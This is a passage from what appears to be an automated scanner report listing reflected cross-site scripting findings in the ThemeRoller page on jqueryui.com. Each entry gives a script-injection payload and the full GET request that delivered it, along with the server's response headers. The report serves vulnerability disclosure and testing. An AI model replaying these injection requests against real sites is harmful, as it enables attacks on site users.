Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c572"><script>alert(1)</script>d20b36ec1c was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1af"><script>alert(1)</script>073f89d073f was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd035"><script>alert(1)</script>66642ae8c0e was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><script>alert(1)</script>6c32ca50cc1 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a46"><script>alert(1)</script>37189a3fb88 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34e4"><script>alert(1)</script>6f6deb6985f was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b375"><script>alert(1)</script>7b1d7aa2412 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdc19"><script>alert(1)</script>ce6b6f37d34 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.pngfdc19"><script>alert(1)</script>ce6b6f37d34&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a73"><script>alert(1)</script>ecfc02072aa was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.pngc7a73"><script>alert(1)</script>ecfc02072aa&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68388"><script>alert(1)</script>c2f5ccaa993 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png68388"><script>alert(1)</script>c2f5ccaa993&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e580"><script>alert(1)</script>1fa0fca1bf5 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd8508e580"><script>alert(1)</script>1fa0fca1bf5&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bac"><script>alert(1)</script>fd22abbdbef was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd95bac"><script>alert(1)</script>fd22abbdbef&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a6a4"><script>alert(1)</script>35255517304 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc2a6a4"><script>alert(1)</script>35255517304&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228e